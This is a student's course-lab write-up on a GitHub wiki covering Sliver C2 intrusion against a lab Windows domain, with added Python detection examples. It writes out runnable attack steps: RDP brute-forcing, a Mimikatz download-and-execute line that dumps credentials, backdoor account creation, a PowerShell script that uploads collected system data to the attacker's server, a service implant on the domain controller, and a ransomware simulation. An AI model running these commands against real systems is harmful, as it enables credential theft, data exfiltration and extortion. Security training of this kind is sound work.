Sliver C2 ‐ Lab 2 - jacobwilliams100/sec-440 GitHub Wiki
In this continuation of Sliver C2 - Lab 1, we will be simulating lateral movement, execution, exfiltration, and impact tactics often seen in real-world scenarios.
On wks1, Sysmon is now running and a Sysmon event appears in Event Viewer.

Deliverable #1 - Show proof of Sysmon running on your system and the log files are accessible through Windows Event Viewer.

Creating two simple text files containing usernames and passwords. Make sure that the usernames you use include at least one of the users you have created in your domain. Also make sure that they are using a simple password, such as “Passw0rd!”, and make sure it is included in your passwords file.
We start by creating two text files with usernames and passwords. Not all of them have to be real, but at least one should.

Now we install crowbar with sudo apt install crowbar

Now we will use it to brute-force the target Windows system. This command will run through the credentials in users.txt and passwords.txt until it finds a combination that works. Make sure you enter your target machine's IP address, and don't forget the subnet mask: crowbar expects the target in CIDR notation.
crowbar -b rdp -s <ip-address> -U users.txt -C passwords.txt
As we can see, it found access to the Administrator account using the @dm1nistrator password, as well as the jake account with the f1$h3000 password.
Now we will do this with Hydra instead. It does basically the same thing. Run hydra -L users.txt -P passwords.txt <ip-address> rdp

I added user jake as an RDP user in wks1 just so I could get more than one result to appear.
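Both tools leave a dense trail of failed logons on the target, which is how a defender spots this. As an added example (not part of the lab), here is Python that scans Windows Security log records for a burst of failed RDP-type logons from one source followed by a success; the event records are constructed, and the threshold and window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records: (time, event_id, logon_type, account, source_ip).
# 4625 = failed logon, 4624 = successful logon. RDP shows up as logon type 10, but when
# Network Level Authentication is on, failed attempts are usually recorded as type 3.
RDP_LOGON_TYPES = {3, 10}
SAMPLE_EVENTS = [
    ("2024-05-01 10:00:01", 4625, 3, "administrator", "10.0.5.110"),
    ("2024-05-01 10:00:02", 4625, 3, "administrator", "10.0.5.110"),
    ("2024-05-01 10:00:03", 4625, 3, "jake", "10.0.5.110"),
    ("2024-05-01 10:00:04", 4625, 3, "jake", "10.0.5.110"),
    ("2024-05-01 10:00:05", 4625, 3, "bob", "10.0.5.110"),
    ("2024-05-01 10:00:06", 4625, 3, "bob", "10.0.5.110"),
    ("2024-05-01 10:00:08", 4624, 10, "jake", "10.0.5.110"),   # a guess worked
    ("2024-05-01 10:30:00", 4625, 10, "alice", "10.0.5.20"),   # one typo, normal user
    ("2024-05-01 10:31:00", 4624, 10, "alice", "10.0.5.20"),
]

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Return {source_ip: summary} for sources with >= threshold failed RDP-type logons
    inside `window`; a 4624 from that source after the burst marks a likely cracked account."""
    by_ip = defaultdict(list)
    for ts, eid, ltype, acct, ip in events:
        if ltype in RDP_LOGON_TYPES:
            by_ip[ip].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, acct))
    alerts = {}
    for ip, rows in by_ip.items():
        rows.sort()
        fails = [r for r in rows if r[1] == 4625]
        for i in range(len(fails) - threshold + 1):           # sliding window over failures
            if fails[i + threshold - 1][0] - fails[i][0] <= window:
                burst_end = fails[i + threshold - 1][0]
                wins = [r for r in rows if r[1] == 4624 and r[0] >= burst_end]
                alerts[ip] = {
                    "failures": len(fails),
                    "accounts_tried": sorted({r[2] for r in fails}),
                    "success_after_burst": bool(wins),
                    "cracked_accounts": sorted({r[2] for r in wins}),
                }
                break
    return alerts
```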
We will be using Remote Desktop protocol to go into the domain and find the Administrator's password hashes.
We will be using the jake user credentials to do this:
- username: jake
- password: f1$h3000
xfreerdp will help us do this.
Let's use it to remote into AD01 with xfreerdp /u:jake /p:'f1$h3000' /w:1024 /h:768 /v:10.0.5.5:3389 (10.0.5.5 is the IP address of AD01)
NOTE: if you are having issues, try putting '' around the password, it appears that sometimes freerdp cannot read special characters properly without this.
NOTE: you may need to manually activate RDP on AD01 with Settings by going to Server Manager->Local Server->Remote Desktop, and jake must be a domain admin.

On login, you should see something like this:

Enter Y and it should open the remote desktop window.


From the sliver shell, we will run some commands to perform some basic enumeration and see who has admin privileges
run execute -o hostname to display the hostname
run execute -o net localgroup administrators to see who has admin privileges

We can also see the status of Windows Defender with execute -o powershell Get-MpComputerStatus

Notice, RealTimeProtectionEnabled is false because I turned it off earlier.

Shown in the last 3 screenshots.
First, on kali, we must download sysinternals suite from https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Move it to /var/www/html/files and unzip it


We will upload PsExec64.exe to the target through sliver, renaming it ps.exe, with `upload /var/www/html/files/PsExec64.exe C:\Users\Public\ps.exe`

Now, on wks01 (the victim system), open a command prompt, change directory to C:\Users\Public and run PsExec (now ps.exe) against the domain controller with .\ps.exe -accepteula \\ad01.jake.local -u jake -i -s cmd.exe
Use the password from earlier when prompted; if successful it should look like this:

Here, we will simulate the usage of Mimikatz. Back on kali, we will clone Mimikatz with git clone https://github.com/g4uss47/Invoke-Mimikatz

Next, we must copy Invoke-Mimikatz.ps1 to the webserver file directory with sudo cp Invoke-Mimikatz/Invoke-Mimikatz.ps1 /var/www/html/files

Now back on the sliver client (with the open session to wks01), run shell to start a shell

From this shell, we will use Method #1, running Mimikatz directly from memory.
First run (New-Object System.Net.WebClient).DownloadString('http://10.0.5.110/files/Invoke-Mimikatz.ps1') | IEX (make sure to swap this IP out for your own kali VM's IP)
Then run Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

It will take a minute to load, but you should eventually get output like this:

If you scroll through this list, you will see that Mimikatz has extracted passwords and hashes for accounts on the system. That is cool, but also scary!


See last 3 screenshots.
We will perform a simple exfiltration task to get data out of wks01 and back onto the kali VM
exit the shell and run these commands from the session context:
execute -o Powershell.exe -nop -wind hidden -Exec Bypass "C:\Windows\SysWOW64\cmd.exe"
execute -o net user /add user2 'Passw0rd!'
execute -o net user /add user1 'Passw0rd!'

Now go back into the shell and run each of the following commands. We will be filling C:\Users\Public\Documents\info.txt with all kinds of useful info about the computer.
Get-WinEvent -ListLog * >> C:\Users\Public\Documents\info.txt
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> C:\Users\Public\Documents\info.txt
ipconfig /all >> C:\Users\Public\Documents\info.txt
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" >> C:\Users\Public\Documents\info.txt
Schtasks /query /fo LIST /v >> C:\Users\Public\Documents\info.txt
route PRINT >> C:\Users\Public\Documents\info.txt
arp -a >> C:\Users\Public\Documents\info.txt
netstat -ano >> C:\Users\Public\Documents\info.txt
netsh firewall show state >> C:\Users\Public\Documents\info.txt
reg query HKLM /f password /t REG_SZ /s >> C:\Users\Public\Documents\info.txt
([System.Net.Dns]::GetHostByName(($env:computerName))).Hostname >> C:\Users\Public\Documents\info.txt
(Get-WmiObject Win32_ComputerSystem).Domain >> C:\Users\Public\Documents\info.txt
$Domain=(Get-WmiObject Win32_ComputerSystem).Domain
Resolve-DNSName -type All -name $Domain >> C:\Users\Public\Documents\info.txt
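The enumeration commands run from the sliver shell, the net user /add and hidden PowerShell executions, and the collection commands above all surface as Sysmon Event ID 1 process creations on wks01. As an added example (not from the lab or from Sysmon itself), this Python scores constructed process-creation records against rules built from those command lines and flags a parent process whose children trip several of them; the record layout, the implant.exe name and the rule set are assumptions.

```python
import re

# Rules: (label, regex over the lowercased CommandLine). Patterns mirror the commands run in
# this lab; tune them to your own environment before alerting on them.
RULES = [
    ("admin group enumeration", re.compile(r"\bnet\s+localgroup\s+administrators\b")),
    ("local account creation", re.compile(r"\bnet\s+user\s+(/add|\S+\s+\S+\s+/add)\b")),
    ("hidden/bypass powershell", re.compile(r"powershell.*-(wind(owstyle)?\s+hidden|exec(utionpolicy)?\s+bypass)")),
    ("av status query", re.compile(r"get-mpcomputerstatus")),
    ("registry password hunt", re.compile(r"\breg\s+query\s+hklm\s+/f\s+password\b")),
    ("scheduled task discovery", re.compile(r"\bschtasks\s+/query\b")),
    ("autostart service discovery", re.compile(r"\bwmic\s+service\s+get\b")),
    ("shadow copy discovery", re.compile(r"\bvssadmin\s+list\s+shadows\b")),
]

# Constructed Sysmon Event ID 1 records: (UtcTime, Image, ParentImage, CommandLine).
# "implant.exe" is a placeholder for whatever the Sliver implant was named.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_SYSMON = [
    ("2024-05-01T10:05:01", r"C:\Windows\System32\net.exe", r"C:\Users\Public\implant.exe",
     "net localgroup administrators"),
    ("2024-05-01T10:05:03", PS, r"C:\Users\Public\implant.exe",
     'Powershell.exe -nop -wind hidden -Exec Bypass "C:\\Windows\\SysWOW64\\cmd.exe"'),
    ("2024-05-01T10:05:04", r"C:\Windows\System32\net.exe", r"C:\Users\Public\implant.exe",
     "net user /add user2 Passw0rd!"),
    ("2024-05-01T10:06:10", r"C:\Windows\System32\reg.exe", PS,
     "reg query HKLM /f password /t REG_SZ /s"),
    ("2024-05-01T11:00:00", r"C:\Windows\System32\ipconfig.exe", r"C:\Windows\explorer.exe",
     "ipconfig /all"),   # too common on its own to be a rule; stays unflagged
]

def score_process_events(events, min_labels=3):
    """Return (hits, parents): hits = [(time, image, [labels])] per matching record, parents =
    parent images whose children triggered at least `min_labels` distinct rules."""
    hits, per_parent = [], {}
    for ts, image, parent, cmdline in events:
        labels = [label for label, rx in RULES if rx.search(cmdline.lower())]
        if labels:
            hits.append((ts, image, labels))
            per_parent.setdefault(parent, set()).update(labels)
    parents = sorted(p for p, s in per_parent.items() if len(s) >= min_labels)
    return hits, parents
```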

NOTE: the last command kept failing for some reason, and I couldn't figure out why. I ended up going into the VM and completing this specific command manually. Not ideal, but I wanted it in info.txt for completeness' sake.

Deliverable #8 - Submit proof of successfully running different execution commands on your victim’s system.
See last two screenshots.
Back on kali, create a file /home/champuser/Public/upload.ps1

This script will help us exfiltrate all the data we collected through the shell. Add all of the following text:

```powershell
# upload a file with form-data to a URL using PowerShell
# this works with binary files, no conversion happens to the file
#
# this can be used to deploy files on AppVeyor
# run it from the directory that holds info.txt (C:\Users\Public\Documents)
$File='info.txt';
$FilePath = (Get-Item -Path $File).FullName;
$URL = "http://<KALI_IP_ADDRESS>/upload.php";
$fileBytes = [System.IO.File]::ReadAllBytes($FilePath);
# map each byte to one iso-8859-1 character so the bytes survive as a string
$fileEnc = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($fileBytes);
$boundary = [System.Guid]::NewGuid().ToString();
$EOL = "`r`n";
# three parts: the file itself, its name, and a static api key expected by upload.php
$bodyLines = (
"--$boundary",
"Content-Disposition: form-data; name=`"file`"; filename=`"$File`"",
"Content-Type: application/octet-stream",
"",
$fileEnc,
"--$boundary",
"Content-Disposition: form-data; name=`"filename`"",
"",
$File,
"--$boundary",
"Content-Disposition: form-data; name=`"apikey`"",
"",
"abcd",
"--$boundary--",
""
) -join $EOL
Invoke-RestMethod -Uri $URL -Method Post -ContentType "multipart/form-data; boundary=`"$boundary`"" -Body $bodyLines
```
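To see what the receiving end of this script has to handle, here is an added Python example (not part of the lab and not the upload.php linked below): it rebuilds the same multipart body layout that upload.ps1 produces and parses it back into its fields, which works just as well on a POST body captured from the network. The file contents and boundary value are constructed.

```python
def build_body(file_name: str, file_bytes: bytes, apikey: str, boundary: str) -> bytes:
    """Same part layout as upload.ps1 (file, filename, apikey), CRLF-separated, kept as bytes."""
    b = boundary.encode()
    lines = [
        b"--" + b,
        b'Content-Disposition: form-data; name="file"; filename="' + file_name.encode() + b'"',
        b"Content-Type: application/octet-stream",
        b"",
        file_bytes,                       # the PS script carries these bytes as iso-8859-1 text
        b"--" + b,
        b'Content-Disposition: form-data; name="filename"',
        b"",
        file_name.encode(),
        b"--" + b,
        b'Content-Disposition: form-data; name="apikey"',
        b"",
        apikey.encode(),
        b"--" + b + b"--",
        b"",
    ]
    return b"\r\n".join(lines)

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: (filename or None, payload bytes)}; boundary comes from Content-Type."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:            # [0] is the (empty) preamble
        if part.startswith(b"--"):                # reached the closing "--boundary--"
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        head, _, payload = part.partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):             # CRLF that precedes the next boundary
            payload = payload[:-2]
        name = fname = None
        for header in head.split(b"\r\n"):
            if header.lower().startswith(b"content-disposition:"):
                for kv in header.split(b";")[1:]:
                    key, _, val = kv.strip().partition(b"=")
                    if key == b"name":
                        name = val.strip(b'"').decode()
                    elif key == b"filename":
                        fname = val.strip(b'"').decode()
        fields[name] = (fname, payload)
    return fields

# Constructed sample with bytes that a text-only transport would mangle.
SAMPLE_FILE = b"OS Name: Microsoft Windows 10 Pro\r\n\x00\xff\x80 binary bytes\r\n"
SAMPLE_BOUNDARY = "3f9a6f2e-1b0c-4d7e-9a1f-000000000001"
```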
Make sure you add your own IP address here:

Now download upload.php from here: https://drive.google.com/file/d/1tc0ri-kCPZn8LfebVyIQLgaTjJo3pb9o/view

move it to /var/www/html

Back in the sliver-client session, upload upload.ps1 to wks01 with upload '/home/champuser/Public/upload.ps1' 'C:\Users\Public\Documents\up.ps1'

start the shell back up, and run cd C:\Users\Public\Documents to get to the directory of info.txt

And do dir to confirm current directory contents

Lastly, do .\up.ps1 to run the exfiltration script!
NOTE: This did not immediately work. I needed to unrestrict my Windows Execution policy with Set-ExecutionPolicy Unrestricted to run the script, and I needed to replace my python HTTP server with a standard Apache server to get it to accept POST method requests, and then I needed to create a directory at /var/www/html/uploads



Error log that gave me the clue on why it was failing:

Creating an open-to-everyone directory at /var/www/html/uploads

Success!




The file is huge because I put the output of every command in the list in. There is a lot to parse but this could be very useful.
We will be deploying a Windows Service as a backdoor on AD01.
We will be deploying this attack from wks01, so you must have a session with a domain administrator on wks01 to authenticate to AD01.
First, we generate a Windows service implant profile with profiles new --format service --skip-symbols --mtls 10.0.5.110 win-service (if you're in a session, you need to leave it first; also, use your own sliver-server's IP instead of this one).
Go back into the session, and run psexec -b C:\\Windows\\System32 -d 'Disk Scheduling Service' -s DskSch.exe -p win-service 10.0.5.5 to deploy the infected service to AD01 (10.0.5.5 is the IP of AD01)

Notice that when we run sessions, there is a new session, TRADITIONAL_PROFESSOR, which this infected service generated.


We now have a SYSTEM account on the Domain Controller
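A service installed this way is recorded on AD01 as System log Event ID 7045, which is the cleanest place to catch it. As an added example (not part of the lab), this Python compares constructed 7045 records against an assumed baseline of services captured before the engagement and spells out why the DskSch.exe entry stands out; the baseline contents and record layout are assumptions.

```python
# Assumed baseline of (service name, executable file name) captured from AD01 before the lab.
BASELINE = {
    ("Dnscache", "svchost.exe"), ("Netlogon", "lsass.exe"),
    ("Spooler", "spoolsv.exe"), ("W32Time", "svchost.exe"),
}

# Constructed System-log Event ID 7045 records: (UtcTime, ServiceName, DisplayName, ImagePath, Account).
SAMPLE_7045 = [
    ("2024-05-01T12:00:00", "W32Time", "Windows Time",
     r"C:\Windows\System32\svchost.exe -k LocalService", "LocalSystem"),
    ("2024-05-01T12:03:17", "DskSch.exe", "Disk Scheduling Service",
     r"C:\Windows\System32\DskSch.exe", "LocalSystem"),
]

def image_basename(image_path: str) -> str:
    """Executable file name from an ImagePath, ignoring quotes and trailing arguments."""
    exe = image_path.strip('"').split(" -")[0].strip('"')
    return exe.rsplit("\\", 1)[-1]

def flag_new_services(events, baseline=BASELINE):
    """Return [(service name, reasons, time)] for 7045 records that deserve a look."""
    findings = []
    for ts, name, display, image, account in events:
        exe = image_basename(image)
        reasons = []
        if (name, exe) not in baseline:
            reasons.append("not in baseline")
            if account == "LocalSystem":
                reasons.append("new service runs as LocalSystem")
        if name.lower() == exe.lower():           # as with "-s DskSch.exe" above
            reasons.append("service name is just the executable file name")
        if reasons:
            findings.append((name, reasons, ts))
    return findings
```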
We will be running ransomware on a target computer to simulate a ransomware attack.
On wks01, Download LoadObfuscatedScript.ps1, RansomwareSim.ps1 and create-vsc.ps1 from https://drive.google.com/drive/folders/1RHfr9G1MUHoU5dngDKiJz8LhAynqP0ad?usp=sharing and https://github.com/ashemery/scripts


Next, we will use create-vsc.ps1 to generate a Volume Shadow Copy on your C: volume as a backup.

I was using create-vsc.ps1 script wrong at first, so I just created a shadow copy manually.
I started by changing some settings in Local Group Policy Editor to allow the creation of shadow copies

Then go to Explorer -> right-click This PC -> System Protection, turn Protection on for disk C:, then "Create" a restore point.
You should be able to see it now in PowerShell with vssadmin list shadows

EDIT: I figured out how to run the script, so I will do this the correct way too. Run Powershell.exe -noexit -ExecutionPolicy Bypass -File .\LoadObfuscatedScript.ps1 .\create-vsc.ps1 PASSWORD (but replace PASSWORD with the "LoadScripts File" password from the top of the document)

Now we have a second shadow copy, created by script


First, we load our ransomware module with .\LoadObfuscatedScript.ps1 ObfRansomSimulation1.ps1 PASSWORD (once again, switch PASSWORD for the one in the document)

Then run the ransomware on your user's documents folder with:
Encrypt-Directory -DirectoryPath C:\Users\<username>\Documents

If we check the folder, we can see that the soda.txt text file I created there has been encrypted and is unreadable.


We can decrypt it with Decrypt-Directory -DirectoryPath C:\Users\jake\Documents
When prompted, enter the Encryption Key (Base64) and Encryption IV (Base64) Values. You need to get these 100% right or else it will not decrypt

soda.txt is now decrypted and readable again


Deliverable #12 - Submit proof of successfully Encrypting and Decrypting files using the Ransomware Module.
See last 6 screenshots
I found this lab to be very instructive. I really enjoyed getting to learn such a broad range of intrusion tools alongside learning more about Sliver C2. Now that I have a basic understanding of intrusion tools, I feel that I have a better idea of how to keep networks and domains secure. My favorite part was using the backdoor service to create a SYSTEM sliver session to the domain controller. It felt like a semi-realistic example of using a foothold to strengthen a persistent threat on a system. I was also intrigued by Mimikatz's ability to retrieve credentials such as passwords and hashes; it seems like a very powerful tool for this reason.
I enjoyed the data collection and exfiltration part as well, although I encountered significant difficulty getting up1.ps1 to work properly. I had to replace my Python web server with an Apache installation to allow POST commands, I had to install PHP, and I had to create a new directory on the web server at /var/www/html/uploads for the exfiltrated files, but I got it to work. I think this particular section could use some more detailed directions. I had some trouble with the ransomware section as well, but it was entirely my own fault for not reading the instructions carefully enough. I did not realize that create-vsc.ps1 was an encrypted script and was not using the commands correctly with the password to run it.